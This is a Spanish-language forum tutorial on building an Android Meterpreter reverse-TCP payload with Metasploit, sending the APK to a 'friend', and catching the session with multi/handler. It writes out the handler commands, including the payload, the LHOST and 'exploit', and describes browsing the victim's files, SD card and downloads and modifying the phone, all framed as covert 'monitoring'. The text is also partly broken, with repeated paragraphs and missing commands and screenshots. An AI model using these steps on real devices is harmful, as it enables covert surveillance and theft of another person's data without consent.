Buenas aca les dejo un tutorial para realizar server para android usando la terminal de Ubuntu Linux mediante Kali y Metasploit.
En este tuto se vera como monitorear cualquier móvil Android usando las consolas msfpayload y msfconsole en Kali Linux. Esto debe instalarse en su PC. No necesita acceso físico al celular del amigo para monitorear.
Requisitos:
Kali software en el sistema operativo Linux (solamente).
Framework Metasploit actualizado.
Monitoreo de actividad del sistema, incluyendo manejo e instalación de aplicaciones.
Paso 1: Ejecutamos el siguiente comando en una terminal vacía de Kali Linux.
En este tuto se vera como monitorear cualquier móvil Android usando las consolas msfpayload y msfconsole en Kali Linux. Esto debe instalarse en su PC. No necesita acceso físico al celular del amigo para monitorear.
Requisitos:
Kali software en el sistema operativo Linux (solamente).
Framework Metasploit actualizado.
Monitoreo de actividad del sistema, incluyendo manejo e instalación de aplicaciones.
Paso 1: Ejecutamos el siguiente comando en una terminal vacía de Kali Linux.
Una vez insertado este comando, le aparecerá en la pantalla este resultado:
Paso 2: Ponemos “ls” en la línea de comandos e ingresamos.
Ahora el archivo ya se ha creado, entonces solo debemos enviar el archivo al amigo y tendrá que instalar ese archivo de aplicación en el celular android.
Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando: “msfconsole” en una nueva terminal:
Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando: “msfconsole” en una nueva terminal:
Tomará algo de tiempo, esperamos pacientemente… Luego aparecerá una pantalla similar a esta:
Paso 4: Ya lo tenemos, entonces en esa nueva terminal que aparece, la “msfconsole”, vamos a buscar el multihandler. Ponemos la siguiente línea de comandos: “search multi/handler” de la siguiente manera.
Pulsamos “Enter” y nos aparecerá el siguiente resultado:
Paso 5: Entonces a continuación debemos digitar “Use exploit/multi/handler”.
Paso 6: Configuramos el “payload” que habíamos tomado en “msfpayload” (android/meterpreter/reverse_tcp), entonces insertamos “set PAYLOAD android/meterpreter/reverse_tcp” y la terminal se verá como la siguiente:
Y ya el “payload” está configurado.
Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”). Para eso ponemos “show options”.
Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”). Para eso ponemos “show options”.
Podemos ver que el LPORT ya está ahí con su valor.
Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”.
Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”.
Una vez hecho esto, el valor para LHOST ya fue definido. Podemos digitar nuevamente “show options” para ver los nuevos valores de LHOST y LPORT.
Paso 9: Digitamos “exploit” y aparecerá algo como esto. En la segunda línea de los resultados veremos: “Starting the payload handler…”
Ahora todo ya está configurado. Solo esperamos a que el amigo cliqué en el archivo que creaste. Una vez lo ejecute, recibirás una conexión “meterpreter”. La terminal se verá como la siguiente:
Como puedes ver, ahora cuentas con una sesión “meterpreter”.
Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el resultado en OS narra una unión entre Linux y Android.
Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el resultado en OS narra una unión entre Linux y Android.
Si a continuación ingresamos el símbolo de interrogación “?” vemos a la siguiente información:
Si ponemos “Ifconfig”, revelará las interfaces:
Para revelar la información contenida en el android, ponemos los siguientes comandos en orden: “pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen:
Para revelar la información contenida en el android, ponemos los siguientes comandos en orden: “pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen:
De esta manera hemos obtenido un árbol completo de archivos como la siguiente:
Paso 10: Ingresamos a la tarjeta SD con los comandos: “cd sdcard” y “ls” como la siguiente imagen:
Luego ponemos “cd download” y “ls” seguido…
podemos ver las aplicaciones que el amigo ha descargado.
Podemos incluso hacer modificaciones en el teléfono del amigo.
En la página oficial Kali.org pueden descargar el programa de manera gratuita.
En la página oficial Kali.org pueden descargar el programa de manera gratuita.
Espero les haya gustado el Tutorial (solo con fines educativos)
Regards...